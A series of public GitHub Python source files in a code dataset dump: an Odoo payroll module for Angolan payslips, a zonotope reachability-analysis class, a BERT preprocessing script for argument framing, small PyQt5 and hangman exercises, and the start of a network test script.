compute_remuneration(self):\n res = {}\n for slip in self:\n _sum = 0.0\n for line in slip.line_ids:\n if line.appears_on_payslip == False:\n continue;\n if line.category_id.code == 'BAS':\n _sum = _sum + line.total\n res[slip.id] = _sum\n slip.remuneration = _sum\n return res\n\n # @api.one\n def compute_overtimes(self):\n res = {}\n for slip in self:\n _sum = 0.0\n for line in slip.line_ids:\n if line.appears_on_payslip == False:\n continue;\n if line.category_id.code == 'HEXTRA':\n _sum = _sum + line.total\n res[slip.id] = _sum\n slip.overtimes = _sum\n return res\n\n # @api.one\n def compute_extra_remunerations(self):\n res = {}\n for slip in self:\n slip.extra_remunerations = slip.total_remunerations - slip.remuneration - slip.overtimes\n return res\n\n # @api.one\n def compute_misses(self):\n res = {}\n for slip in self:\n _sum = 0.0\n for line in slip.line_ids:\n if line.appears_on_payslip == False:\n continue;\n if line.category_id.code == 'FALTA':\n _sum = _sum + line.total\n res[slip.id] = _sum\n slip.misses = _sum\n return res\n\n # @api.one\n def compute_remuneration_inss_base(self):\n for slip in self:\n slip.remuneration_inss_base = slip.remuneration + slip.overtimes + slip.misses\n\n # @api.one\n def compute_remuneration_inss_extra(self):\n res = {}\n for slip in self:\n _sum = 0.0\n for line in slip.line_ids:\n if line.appears_on_payslip == False:\n continue;\n if line.category_id.code in ('ABOINSS', 'ABOINSSIRT'):\n _sum = _sum + line.total\n res[slip.id] = _sum\n slip.remuneration_inss_extra = _sum\n return res\n\n # @api.one\n def compute_remuneration_inss_total(self):\n for slip in self:\n slip.remuneration_inss_total = slip.remuneration_inss_base + slip.remuneration_inss_extra\n\n # @api.one\n def compute_amount_inss(self):\n res = {}\n for slip in self:\n _sum = 0.0\n for line in slip.line_ids:\n if line.appears_on_payslip == False:\n continue;\n if line.category_id.code == 'INSS':\n _sum = _sum + line.total\n res[slip.id] = _sum\n slip.amount_inss = _sum\n return res\n\n # @api.multi\n def compute_amount_irt(self):\n res = {}\n for slip in self:\n _sum = 0.0\n for line in slip.line_ids:\n if line.appears_on_payslip == False:\n continue;\n if line.category_id.code == 'IRT':\n _sum = _sum + line.total\n res[slip.id] = _sum\n slip.amount_irt = _sum\n return res\n\n def compute_extra_deductions(self):\n for p in self:\n _sum = 0.0\n for line in p.line_ids:\n if line.category_id.code not in ('INSS', 'IRT') and line.deduction > 0:\n _sum = _sum + line.deduction\n p.extra_deductions = -_sum\n\n def compute_amount_base_irt(self):\n res = {}\n for slip in self:\n _sum = 0.0\n for line in slip.line_ids:\n if line.appears_on_payslip == False:\n continue;\n if line.category_id.code in ('BAS', 'HEXTRA', 'FALTA', 'ABOIRT', 'ABOINSSIRT', 'DEDINSSIRT', 'INSS'):\n _sum = _sum + line.total\n res[slip.id] = _sum\n slip.amount_base_irt = _sum\n return res\n\n # @api.multi\n def compute_payslip_period(self):\n res = {}\n for slip in self:\n # date_obj = datetime.strptime(slip.date_to, '%Y-%m-%d')\n date_obj = slip.date_to\n months = {\n 1: _('January'),\n 2: _('February'),\n 3: _('March'),\n 4: _('April'),\n 5: _('May'),\n 6: _('June'),\n 7: _('July'),\n 8: _('August'),\n 9: _('September'),\n 10: _('October'),\n 11: _('November'),\n 12: _('December'),\n }\n # return months[int(date_obj.month)]\n slip.payslip_period = months[int(date_obj.month)]\n\n # @api.multi\n def compute_total_remunerations(self):\n res = {}\n for slip in self:\n rem_total = 0.0\n for slipline in slip.line_ids:\n if not slipline.appears_on_payslip:\n continue\n rem_total += slipline.remuneration\n res[slip.id] = rem_total\n slip.total_remunerations = rem_total\n return res\n\n # @api.one\n def compute_total_deductions(self):\n res = {}\n for slip in self:\n ded_total = 0.0\n for slipline in slip.line_ids:\n if not slipline.appears_on_payslip:\n continue\n ded_total += slipline.deduction\n res[slip.id] = ded_total\n slip.total_deductions = ded_total\n return res\n\n # @api.multi\n def compute_total_paid(self):\n for slip in self:\n slip.total_paid = slip.total_remunerations - slip.total_deductions\n\n # @api.multi\n def compute_total_paid_usd(self):\n aoa_currency = self.env.ref('base.AOA')\n usd_currency = self.env.ref('base.USD')\n for slip in self:\n slip.total_paid_usd = aoa_currency._compute(aoa_currency, usd_currency, slip.total_paid)\n\n # @api.one\n def compute_period_working_days(self):\n for payslip in self:\n # TODO Add code to consider public holidays\n schedule = payslip.contract_id.resource_calendar_id\n total_days = 0\n date_from = fields.Date.from_string(payslip.date_from)\n date_to = fields.Date.from_string(payslip.date_to)\n delta_days = (date_to - date_from).days\n for single_date in (date_from + timedelta(n) for n in range(delta_days + 1)):\n total_days += 1\n payslip.period_working_days = total_days\n\n @api.onchange('date_to')\n def on_change_date_to(self):\n for payslip in self:\n aoa_currency = self.env.ref('base.AOA').with_context(date=payslip.date_to)\n usd_currency = self.env.ref('base.USD').with_context(date=payslip.date_to)\n rate_date_at = self.env[\"res.company\"].sudo().search([], limit=1)\n if rate_date_at:\n if rate_date_at.rate_date_at == 'current_date':\n payslip.currency_rate = self.env['res.currency']._get_conversion_rate(usd_currency, aoa_currency,\n payslip.company_id or self.env.user.company_id,\n date.today())\n elif rate_date_at.rate_date_at == 'payslip_close_date':\n payslip.currency_rate = self.env['res.currency']._get_conversion_rate(usd_currency, aoa_currency,\n payslip.company_id or self.env.user.company_id,\n payslip.date_to)\n\n @api.depends('date_to', 'company_id')\n # @api.one\n def compute_currency_rate(self):\n for payslip in self:\n aoa_currency = self.env.ref('base.AOA').with_context(date=payslip.date_to)\n usd_currency = self.env.ref('base.USD').with_context(date=payslip.date_to)\n # self.currency_rate = self.env['res.currency']._get_conversion_rate(usd_currency, aoa_currency, self.company_id or self.env.user.company_id,\n # self.date_to)\n rate_date_at = self.env[\"res.company\"].sudo().search([('id', '=', payslip.company_id.id)], limit=1)\n if rate_date_at:\n if rate_date_at.rate_date_at == 'current_date':\n payslip.currency_rate = self.env['res.currency']._get_conversion_rate(usd_currency, aoa_currency,\n payslip.company_id or self.env.user.company_id,\n date.today())\n elif rate_date_at.rate_date_at == 'payslip_close_date':\n payslip.currency_rate = self.env['res.currency']._get_conversion_rate(usd_currency, aoa_currency,\n payslip.company_id or self.env.user.company_id,\n payslip.date_to)\n\n # @api.one\n def compute_show_total_paid_usd(self):\n for slip in self:\n slip.show_total_paid_usd = slip.env.user.company_id.show_paid_usd\n\n ####Send email\n def action_send_email(self, cr=None, context=None):\n '''\n This function opens a window to compose an email, with the edi sale template message loaded by default\n '''\n uid = self.env.user\n ids = [self.id]\n\n template_id = self.env.ref('l10n_ao_hr_payroll.email_template_payslip_send_email', False)\n compose_form_id = False\n\n ctx = dict()\n ctx.update({\n 'default_model': 'hr.payslip',\n 'default_res_id': self.id,\n 'default_use_template': bool(template_id),\n 'default_template_id': template_id and template_id.id or False,\n 'default_composition_mode': 'comment',\n })\n return {\n 'type': 'ir.actions.act_window',\n 'view_type': 'form',\n 'view_mode': 'form',\n 'res_model': 'mail.compose.message',\n 'views': [(compose_form_id, 'form')],\n 'view_id': compose_form_id,\n 'target': 'new',\n 'context': ctx,\n }\n\n remuneration = fields.Float(compute=compute_remuneration, digits=(10, 2), string='Remuneration',\n help='This is the Wage amount')\n overtimes = fields.Float(compute=compute_overtimes, digits=(10, 2), string='Overtimes',\n help='This is the total amount for Overtimes')\n extra_remunerations = fields.Float(compute=compute_extra_remunerations, digits=(10, 2), string='Extra Remuneration')\n misses = fields.Float(compute=compute_misses, digits=(10, 2), string='Misses',\n help='This is the total discount for misses')\n remuneration_inss_base = fields.Float(compute=compute_remuneration_inss_base, digits=(10, 2),\n string='Base INSS Remuneration',\n help='This is the Wage plus Overtime minus Misses')\n remuneration_inss_extra = fields.Float(compute=compute_remuneration_inss_extra, digits=(10, 2),\n string='Extra INSS Remuneration',\n help='Those are other INSS collectible remunerations')\n remuneration_inss_total = fields.Float(compute=compute_remuneration_inss_total, digits=(10, 2),\n string='Gross Remuneration')\n amount_inss = fields.Float(compute=compute_amount_inss, digits=(10, 2), string='INSS Amount')\n amount_irt = fields.Float(compute=compute_amount_irt, digits=(10, 2), string='IRT Amount')\n extra_deductions = fields.Float(compute=compute_extra_deductions, digits=(10, 2), string='Extra Deduction')\n amount_base_irt = fields.Float(compute=compute_amount_base_irt, digits=(10, 2), string='IRT Base Amount')\n period_working_days = fields.Integer(compute=compute_period_working_days, string='Payslip Days')\n payslip_period = fields.Char(compute=compute_payslip_period, string='Payslip Period')\n total_remunerations = fields.Float(compute=compute_total_remunerations, digits=(10, 2),\n string='Total of Remunerations')\n total_deductions = fields.Float(compute=compute_total_deductions, digits=(10, 2), string='Total of Deductions')\n total_paid = fields.Float(compute=compute_total_paid, digits=(10, 2), string='Total Paid')\n currency_rate = fields.Float('Currency Rate', dp.get_precision('Payroll Rate'), compute=compute_currency_rate,\n store=True)\n total_paid_usd = fields.Float(compute=compute_total_paid_usd, digits=(10, 2), string='Total Paid (USD)')\n show_total_paid_usd = fields.Boolean(compute=compute_show_total_paid_usd, string='Show Total Paid (USD)')\n wage = fields.Monetary(related=\"line_ids.contract_id.wage\")\n\n @api.onchange('employee_id')\n def on_change_employee_id(self):\n for payslip in self:\n if payslip.employee_id:\n contract_id = self.env[\"hr.contract\"].sudo().search(\n [('employee_id', '=', payslip.employee_id.id), ('date_start', '<=', payslip.date_to), '|',\n ('date_end', '>=', payslip.date_from),\n ('date_end', '=', False)], limit=1)\n if contract_id:\n payslip.contract_id = contract_id\n else:\n payslip.contract_id = False\n payslip.struct_id = False\n\n @api.onchange('contract_id')\n def on_change_contract_id(self):\n for payslip in self:\n if payslip.contract_id:\n struct_id = self.env[\"hr.payroll.structure\"].sudo().search(\n [('type_id', '=', payslip.contract_id.structure_type_id.id)], limit=1)\n if struct_id:\n payslip.struct_id = struct_id\n else:\n payslip.name = \"\"\n\n\nclass PayslipRun(models.Model):\n _inherit = 'hr.payslip.run'\n\n # @api.multi\n def action_send_email(self):\n for slip_run in self:\n for slip in slip_run.slip_ids:\n template = self.env.ref('l10n_ao_hr_payroll.email_template_payslipsendingtemplate0')\n self.env['mail.template'].browse(template.id).send_mail(slip.id)\n template.send_mail(slip.id)\n","repo_name":"DosSantosAlberto/V16","sub_path":"l10n_ao_hr_payroll/models/payslip.py","file_name":"payslip.py","file_ext":"py","file_size_in_byte":19676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"7404759580","text":"# -------------------------------------------------------------\n# code developed by Michael Hartmann during his Ph.D.\n# Reachability Analysis\n#\n# (C) 2020 Michael Hartmann, Graz, Austria\n# Released under GNU GENERAL PUBLIC LICENSE\n# email michael.hartmann@v2c2.at\n# -------------------------------------------------------------\n\nfrom reachab.util.visualizer import *\nimport numpy as np\nimport scipy.spatial\nfrom scipy import signal\n\n\"\"\"\n Class for reachability analysis\n\"\"\"\nclass reachability(object):\n def __init__(self, **kwargs):\n self.params={'T': kwargs.get('T',2.2),\n 'N': kwargs.get('N',4),\n 'gamma': 0.01 #threshold for control input constraint (inf-norm)\n }\n self.obj_visual = visualizer()\n self.params['r']=self.params['T']/(self.params['N']+1)\n self.sys={'A': None, 'B': None, 'C': None, 'D': None}\n self.init_fcn()\n\n \"\"\"\n Initial function to get system dynamics\n \"\"\"\n def init_fcn(self):\n A = np.matrix([[0, 0, 1, 0],\n [0, 0, 0, 1],\n [0, 0, 0, 0],\n [0, 0, 0, 0]])\n B = np.matrix([[0, 0],\n [0, 0],\n [1, 0],\n [0, 1]])\n C = np.eye(4)\n D = np.zeros((4, 2))\n self.system_dynamics(A, B, C, D)\n\n\n\n \"\"\"\n System dynamics\n \"\"\"\n def system_dynamics(self, A, B, C, D):\n self.discrete_sys=signal.StateSpace(A, B, C, D, dt=self.params['r'])\n self.sys['A']=np.array(self.discrete_sys.A)\n self.sys['B'] = np.array(self.discrete_sys.B)\n self.sys['C'] = np.array(self.discrete_sys.C)\n self.sys['D'] = np.array(self.discrete_sys.D)\n\n #see Otto Föllinger, \"Regelungstechnik\" and Thesis of Matthias Althoff:\n self.Phi=np.eye(4)+self.params['r']*self.sys['A']+1/(2)*(self.sys['A']*self.params['r'])**2+1/(6)*(self.sys['A']*self.params['r'])**3+1/(24)*(self.sys['A']*self.params['r'])**4\n\n \"\"\"\n Mulitplication with the center\n \"\"\"\n def multiplication_on_center(self, mat):\n return mat*np.matrix(self.zonotype['c'])\n\n \"\"\"\n Multiplication with a generator list\n \"\"\"\n def multiplication_on_generator(self, mat, list):\n return mat*np.matrix(list)\n\n \"\"\"\n Convert to Matrix\n \"\"\"\n def convert_to_matrix(self, list):\n erg=np.hstack((list[0], list[1]))\n for i in range(2, len(list)):\n erg=np.hstack((erg, list[i]))\n return erg\n\n \"\"\"\n Mulitplication on a zonotype\n \"\"\"\n def multiplication_on_zonotype(self, mat, zonotype):\n Z = {'c': None, 'g': None}\n Z['c']=mat*zonotype['c']\n for i in range(0, np.size(zonotype['g'], 1)):\n act_g=zonotype['g'][:,i]\n if(i==0):\n g=mat*act_g\n else:\n g=np.hstack((g, mat*act_g))\n Z['g']=g\n return Z\n\n \"\"\"\n Get unique vectors\n \"\"\"\n def get_unique_vectors(self, vec):\n unique_vec = np.squeeze(np.unique(vec, axis=0))\n return unique_vec\n\n \"\"\"\n Get edge points of zonotype with convex hull operation\n \"\"\"\n def get_points_of_zonotype(self, zonotype):\n c=zonotype['c']\n g=zonotype['g']\n x_vec = [c]\n for wlt in range(0, np.size(g,1)):\n a=g[:, wlt]\n x_pos = [i+a for i in x_vec]\n x_neg = [i-a for i in x_vec]\n x_vec=x_pos+x_neg\n unique_vec=self.get_unique_vectors(x_vec)\n try:\n points = self.compute_convex_hull(unique_vec[:, 0], unique_vec[:, 1])\n except:\n None\n return [points[:, 0], points[:, 1]], unique_vec\n\n \"\"\"\n Compute the convex hull\n \"\"\"\n def compute_convex_hull(self, x, y):\n v=np.transpose(np.vstack([x, y]))\n hull = scipy.spatial.ConvexHull(v)\n return hull.points[hull.vertices]\n\n \"\"\"\n Minkowski sum with two zonotypes\n \"\"\"\n def minkowski_zonotypes(self, ZA, ZB):\n Z={'c': None, 'g': None}\n Z['c']=ZA['c']+ZB['c']\n a=ZA['g']\n b=ZB['g']\n new_g=np.hstack((a, b))\n Z['g'] = new_g\n return Z\n\n\n \"\"\"\n Get Box Hull\n \"\"\"\n def get_box_hull(self, Omega):\n Z = {'c': None, 'g': None}\n r=self.get_points_of_zonotype(Omega)\n std=(((np.max(r[0])-np.min(r[0]))/2, (np.max(r[1])-np.min(r[1]))/2))\n q=np.diag(std)\n Z['c']=Omega['c']\n Z['g'] = np.matrix(np.vstack((q,np.zeros((2,2)))))\n return Z\n\n \"\"\"\n Approximation of Reachability analysis:\n based on algorithm 1 from: Girard, A.; \"Efficient Computation of Reachable Sets of Linear Time-Invariant Systems \n with Inputs\"\n \"\"\"\n def approximate_reachable_set_without_box(self, Omega_0, U):\n all_R = []\n all_X = []\n '''\n algorithm 1 from: Girard, A.; \"Efficient Computation of Reachable Sets of Linear Time-Invariant Systems with \n Inputs\"\n '''\n all_R.append(Omega_0)\n all_X.append(Omega_0)\n #self.params['N']\n # 1. step\n X_0=Omega_0\n X_i=X_0\n # 2. step\n V_0=U\n V_i=V_0\n # 3. step\n S_0={'c': np.matrix([[0],\n [0],\n [0],\n [0],\n ]),\n 'g': np.matrix([[0],\n [0],\n [0],\n [0]\n ])\n }\n S_i=S_0\n # 4. step\n for i in range(0, self.params['N']):\n # 5. step\n X_i = self.multiplication_on_zonotype(self.Phi, X_i)\n all_X.append(X_i)\n # 6. step\n S_i=self.minkowski_zonotypes(S_i, V_i)\n # 7. step\n V_i = self.multiplication_on_zonotype(self.Phi, V_i)\n # 8. step\n Omega_i=self.minkowski_zonotypes(X_i, S_i)\n all_R.append(Omega_i)\n return all_R, all_X\n\n \"\"\"\n Approximation of Reachability analysis:\n based on algorithm 2 from: Girard, A.; \"Efficient Computation of Reachable Sets of Linear Time-Invariant \n Systems with Inputs\"\n \"\"\"\n def approximate_reachable_set_with_box(self, Omega_0, U):\n all_R = []\n all_X = []\n '''\n algorithm 2 from: Girard, A.; \"Efficient Computation of Reachable Sets of Linear Time-Invariant Systems with \n Inputs\"\n '''\n all_R.append(Omega_0)\n all_X.append(Omega_0)\n\n #self.params['N']\n # 1. step\n X_0=Omega_0\n X_i=X_0\n # 2. step\n V_0=U\n V_i=V_0\n # 3. step\n S_0={'c': np.matrix([[0],\n [0],\n [0],\n [0],\n ]),\n 'g': np.matrix([[0],\n [0],\n [0],\n [0]\n ])\n }\n S_i=S_0\n # 4. step\n for i in range(0, self.params['N']):\n # 5. step\n X_i = self.multiplication_on_zonotype(self.Phi, X_i)\n all_X.append(X_i)\n # 6. step\n V_i_box = self.get_box_hull(V_i)\n S_i=self.minkowski_zonotypes(S_i, V_i_box)\n # 7. step\n V_i = self.multiplication_on_zonotype(self.Phi, V_i)\n # 8. step\n Omega_i=self.minkowski_zonotypes(X_i, S_i)\n Omega_i=self.get_box_hull(Omega_i)\n all_R.append(Omega_i)\n return all_R, all_X\n\n \"\"\"\n Approximation of Reachability analysis:\n based on algorithm from: Girard, A.; \"Reachability of Uncertain Linear Systems\n Using Zonotopes\"\n \"\"\"\n def approximate_reachable_set(self):\n '''\n algorithm from: Girard, A.; \"Reachability of Uncertain Linear Systems\n Using Zonotopes\"\n '''\n # 1. step\n #see self.params['N']\n inf_norm_A=np.linalg.norm(self.A, np.inf)\n r_norm_A=self.params['r']*inf_norm_A\n exp_r_norm_A=np.exp(r_norm_A)\n exp_r_A = np.exp(self.params['r']*self.A)\n # 2. step\n alpha_r=(exp_r_norm_A-1-r_norm_A)\n # 3. step\n beta_r=(exp_r_norm_A-1)*self.params['gamma']/inf_norm_A\n # 4. step\n P_0={'c': None, 'g': None}\n P_0['c']=np.array((self.zonotype['c']+self.multiplication_on_center(exp_r_norm_A))/2)\n a = [0.5*(i+self.multiplication_on_generator(exp_r_norm_A, i)) for i in self.zonotype['g']]\n b = [0.5 * (i + self.multiplication_on_generator(exp_r_norm_A, i)) for i in self.zonotype['g']]\n P_0['g']=self.get_unique_vectors(a+b)\n # 5. step\n rad=alpha_r+beta_r\n square_Z=self.square_zonotype(rad)\n Q_0=self.minkowski_zonotypes(P_0, square_Z)\n # 6. step\n all_R=[]\n Q_i = Q_0\n R_i=Q_0\n all_R.append(R_i)\n for i in range(1,self.params['N']-1):\n # 7. step\n P_i=self.multiplication_on_zonotype(exp_r_norm_A, Q_i)\n # 8. step\n square_Z = self.square_zonotype(beta_r)\n Q_i = self.minkowski_zonotypes(P_i, square_Z)\n # 9. step\n all_R.append(Q_i)\n return all_R\n\n \"\"\"\n Center trajectory\n \"\"\"\n def center_trajectory(self, R):\n erg=[]\n for i in range(0, len(R)):\n x = np.float(R[i]['c'][0])\n y = np.float(R[i]['c'][1])\n erg.append((x,y))\n return erg\n\n \"\"\"\n Test function\n \"\"\"\n def test_function(self):\n Omega_0 = {'c': np.matrix([[0],\n [0],\n [10],\n [3]\n ]),\n 'g': np.matrix([[1, -1, 1, .2, .2],\n [1, 1, .3, .2, .5],\n [0, 0, 0, .4, .3],\n [0, 0, 0, .2, .4]\n ])\n }\n U = {'c': np.matrix([[0],\n [0],\n [0],\n [0],\n ]),\n 'g': np.matrix([[1, 0, 1],\n [1, 1, 0],\n [0, 0, 0],\n [0, 0, 0]\n ])\n }\n program = ['without_box', 'with_box']\n program_select = 0\n if (program[0] == program[program_select]):\n R, X = self.approximate_reachable_set_without_box(Omega_0, U)\n elif (program[1] == program[program_select]):\n R, X = self.approximate_reachable_set_with_box(Omega_0, U)\n for act_zono in R:\n zonoset_P0 = self.get_points_of_zonotype(act_zono)\n self.obj_visual.filled_polygon(zonoset_P0, 'green', .2)\n for act_zono in X:\n zonoset_P0 = self.get_points_of_zonotype(act_zono)\n self.obj_visual.filled_polygon(zonoset_P0, 'orange')\n traj = self.center_trajectory(R)\n self.obj_visual.show_traj(traj)\n self.obj_visual.show()\n\nif __name__ == '__main__':\n obj_reach = reachability(**{'T':3, 'N':5})\n obj_reach.test_function()\n","repo_name":"ga74kud/reachab","sub_path":"reachab/src/reachability.py","file_name":"reachability.py","file_ext":"py","file_size_in_byte":11536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"39876403323","text":"\"\"\"\nTransforms csv-files to tsv-files and includes some helper classes and the function to convert argument texts to feature vectors.\n\n:author: Jan Stanicki\n\"\"\"\n\nfrom __future__ import absolute_import, division, print_function\nimport os\nimport sys\nimport logging\nimport csv\n\nimport pandas as pd\nfrom pytorch_pretrained_bert import BertTokenizer, BertModel, BertForMaskedLM, BertForSequenceClassification\n\nTRAIN_CORP_CSV = '../data/frames/data/Webis-argument-framing_train.csv'\nTRAIN_CORP_TSV = '../data/frames/data/Webis-argument-framing_train.tsv'\nTEST_CORP_CSV = '../data/frames/data/Webis-argument-framing_test.csv'\nTEST_CORP_TSV = '../data/frames/data/Webis-argument-framing_test.tsv'\n\ntrain_df = pd.read_csv(TRAIN_CORP_CSV, sep='|', skiprows=1, header=None)\n\ntrain_df_bert = pd.DataFrame({\n #'id':range(len(train_df)),\n 'label':train_df[2],\n 'alpha':['a']*train_df.shape[0],\n 'text': train_df[5].replace(r'\\n', ' ', regex=True)\n})\n\ntrain_df_bert.to_csv(TRAIN_CORP_TSV, sep='\\t', index=1, header=False)\n\ntest_df = pd.read_csv(TEST_CORP_CSV, sep='|', skiprows=1, header=None)\n\ntest_df_bert = pd.DataFrame({\n #'id':range(len(test_df)),\n 'label':test_df[2],\n 'alpha':['a']*test_df.shape[0],\n 'text': test_df[5].replace(r'\\n', ' ', regex=True)\n})\n\ntest_df_bert.to_csv(TEST_CORP_TSV, sep='\\t', index=1, header=False)\n\nlogger = logging.getLogger()\ncsv.field_size_limit(2147483647) # Increase CSV reader's field limit incase we have long text.\n\n\nclass InputExample(object):\n \"\"\"A single training/test example for simple sequence classification.\"\"\"\n\n def __init__(self, guid, text_a, text_b=None, label=None):\n \"\"\"Constructs an InputExample.\n Args:\n :param guid: Unique id for the example.\n :param text_a: string. The untokenized text of the first sequence. For single\n sequence tasks, only this sequence must be specified.\n :param text_b: (Optional) string. The untokenized text of the second sequence.\n Only must be specified for sequence pair tasks.\n :param label: (Optional) string. The label of the example. This should be\n specified for train and dev examples, but not for test examples.\n \"\"\"\n self.guid = guid\n self.text_a = text_a\n self.text_b = text_b\n self.label = label\n\n\nclass DataProcessor(object):\n \"\"\"Base class for data converters for sequence classification data sets.\"\"\"\n\n def get_train_examples(self, data_dir):\n \"\"\"Gets a collection of `InputExample`s for the train set.\"\"\"\n raise NotImplementedError()\n\n def get_dev_examples(self, data_dir):\n \"\"\"Gets a collection of `InputExample`s for the dev set.\"\"\"\n raise NotImplementedError()\n\n def get_labels(self):\n \"\"\"Gets the list of labels for this data set.\"\"\"\n raise NotImplementedError()\n\n @classmethod\n def _read_tsv(cls, input_file, quotechar=None):\n \"\"\"Reads a tab separated value file.\"\"\"\n with open(input_file, \"r\", encoding=\"utf-8\") as f:\n reader = csv.reader(f, delimiter=\"\\t\", quotechar=quotechar)\n lines = []\n for line in reader:\n if sys.version_info[0] == 2:\n line = list(unicode(cell, 'utf-8') for cell in line)\n lines.append(line)\n return lines\n\n\nclass MultiClassificationProcessor(DataProcessor):\n \"\"\"Processor for multi classification dataset.\"\"\"\n\n def get_train_examples(self, data_dir):\n \"\"\"See base class.\"\"\"\n return self._create_examples(\n self._read_tsv(os.path.join(data_dir, \"Webis-argument-framing_train.tsv\")), \"train\")\n\n def get_dev_examples(self, data_dir):\n \"\"\"See base class.\"\"\"\n return self._create_examples(\n self._read_tsv(os.path.join(data_dir, \"Webis-argument-framing_test.tsv\")), \"test\")\n\n def get_labels(self):\n \"\"\"See base class.\"\"\"\n return [str(x) for x in range(10)] #[\"0\", \"1\", \"2\", \"3\", \"4\", \"5\", \"6\"] Try:\n\n def _create_examples(self, lines, set_type):\n \"\"\"Creates examples for the training and dev sets.\"\"\"\n examples = []\n for (i, line) in enumerate(lines):\n guid = \"%s-%s\" % (set_type, i)\n text_a = line[3]\n label = line[1]\n examples.append(\n InputExample(guid=guid, text_a=text_a, text_b=None, label=label))\n return examples\n\nclass InputFeatures(object):\n \"\"\"A single set of features of data.\"\"\"\n\n def __init__(self, input_ids, input_mask, segment_ids, label_id):\n self.input_ids = input_ids\n self.input_mask = input_mask\n self.segment_ids = segment_ids\n self.label_id = label_id\n\ndef convert_example_to_feature(example_row):\n \"\"\"\n Converts an argument example to a feature vector.\n\n :param example_row: tuple of example object, label_map, max_seq_length, tokenizer and output_mode needed for preprocessing\n :type example_row: tuple\n\n \"\"\"\n example, label_map, max_seq_length, tokenizer, output_mode = example_row\n output_mode = \"classification\"\n tokens_a = tokenizer.tokenize(example.text_a)\n tokens_b = None\n if example.text_b:\n tokens_b = tokenizer.tokenize(example.text_b)\n # Modifies `tokens_a` and `tokens_b` in place so that the total\n # length is less than the specified length.\n # Account for [CLS], [SEP], [SEP] with \"- 3\"\n _truncate_seq_pair(tokens_a, tokens_b, max_seq_length - 3)\n else:\n # Account for [CLS] and [SEP] with \"- 2\"\n if len(tokens_a) > max_seq_length - 2:\n tokens_a = tokens_a[:(max_seq_length - 2)]\n\n tokens = [\"[CLS]\"] + tokens_a + [\"[SEP]\"]\n segment_ids = [0] * len(tokens)\n\n if tokens_b:\n tokens += tokens_b + [\"[SEP]\"]\n segment_ids += [1] * (len(tokens_b) + 1)\n\n input_ids = tokenizer.convert_tokens_to_ids(tokens)\n # The mask has 1 for real tokens and 0 for padding tokens. Only real\n # tokens are attended to.\n input_mask = [1] * len(input_ids)\n\n # Zero-pad up to the sequence length.\n padding = [0] * (max_seq_length - len(input_ids))\n input_ids += padding\n input_mask += padding\n segment_ids += padding\n\n assert len(input_ids) == max_seq_length\n assert len(input_mask) == max_seq_length\n assert len(segment_ids) == max_seq_length\n\n\n if hasattr(example_row, 'label_id') and output_mode == \"classification\":\n label_id = label_map[example.label]\n return InputFeatures(input_ids=input_ids,\n input_mask=input_mask,\n segment_ids=segment_ids,\n label_id=label_id)\n else:\n return InputFeatures(input_ids=input_ids,\n input_mask=input_mask,\n segment_ids=segment_ids,\n label_id=None)\n","repo_name":"Micha-Z/gencou","sub_path":"gencou/frame_bert_prepare_data.py","file_name":"frame_bert_prepare_data.py","file_ext":"py","file_size_in_byte":6883,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"15260702899","text":"import sys\nimport qdarkstyle\nimport PyQt5.QtCore\nimport PyQt5.QtWidgets\n\n\nclass Example(PyQt5.QtWidgets.QWidget):\n\t\n\tdef __init__(self):\n\t\tsuper().__init__()\n\t\t\n\t\tself.init_ui()\n\n\tdef init_ui(self):\n\t\t\n\t\tlcd = PyQt5.QtWidgets.QLCDNumber(self) # https://doc.qt.io/qt-5/qlcdnumber.html#details\n\t\tsld = PyQt5.QtWidgets.QSlider(PyQt5.QtCore.Qt.Horizontal, self)\n\n\t\tvbox = PyQt5.QtWidgets.QVBoxLayout()\n\t\tvbox.addWidget(lcd)\n\t\tvbox.addWidget(sld)\n\n\t\tself.setLayout(vbox)\n\t\tsld.valueChanged.connect(lcd.display)\n\t\t\n\t\tself.setGeometry(300, 300, 250, 150)\n\t\tself.setWindowTitle('Signal & slot')\n\t\tself.show()\n\t\t\n\nif __name__ == '__main__':\n\t\n\tapp = PyQt5.QtWidgets.QApplication(sys.argv)\n\tapp.setStyleSheet(qdarkstyle.load_stylesheet_pyqt5())\n\n\tex = Example()\n\tsys.exit(app.exec_())\n\n'''\nwe display a QtGui.QLCDNumber and a QtGui.QSlider. \nWe change the lcd number by dragging the slider knob.\n'''\n\n# sld.valueChanged.connect(lcd.display)\n'''\nHere we connect a valueChanged signal of the slider to \nthe display slot of the lcd number.\n\nThe sender is an object that sends a signal. \nThe receiver is the object that receives the signal. \nThe slot is the method that reacts to the signal.\n'''","repo_name":"Pullem/1st-step-in-python","sub_path":"4_events and signals/1_slider.py","file_name":"1_slider.py","file_ext":"py","file_size_in_byte":1182,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"25719242669","text":"import random\n\nword_list = [\"aardvark\", \"baboon\", \"camel\"]\nchosen_word = random.choice(word_list)\ndisplay = []\nfor char in chosen_word:\n display.append(\"_\")\n\nguess = input(\"Try to guess a letter. Type your answer here: \").lower()\n\nfor position in range(len(chosen_word)):\n letter = chosen_word[position]\n if guess == letter:\n display[position] = letter\n ","repo_name":"MrSmoKkkk98/udemy_course_100_days_of_code","sub_path":"day_7/day_7_hangman_2.py","file_name":"day_7_hangman_2.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"45033504403","text":"import pprint\nimport yaml\nimport pytest\nimport time\nimport sys\nimport os\n\nsys.path.insert(1, os.path.join(sys.path[0],'..')) # !!! PATH fo import with position 1!!!\n# sys.path.insert(1, os.path.join(sys.path[0],'../command_cfg/')) # !!! PATH fo import with position 1!!!\n# sys.path.append(os.path.join(os.getcwd(),'..')) # !!! PATH fo import!!!\n\n# pprint.pprint(sys.path)\n\nfrom ping3 import ping, verbose_ping\nfrom cfg_bm10 import Cfg_bm10\nfrom base_gns3 import Base_gns\nfrom base_bm10 import Base_bm10\n\n\n\nCfg_bm10.console.print(\n \"Тест работает по ПМИ 'Проверка поддержки Multihoming 3G/4G failover (mwan3)'.\\n Рекомендуется ознакомиться с описанием теста.\\n В ходе теста будет запрошено название лабы и предложены варианты ответа\",\n style='info'\n )\ntime.sleep(6)\ncurrent_lab = Base_gns() # test wait this lab - 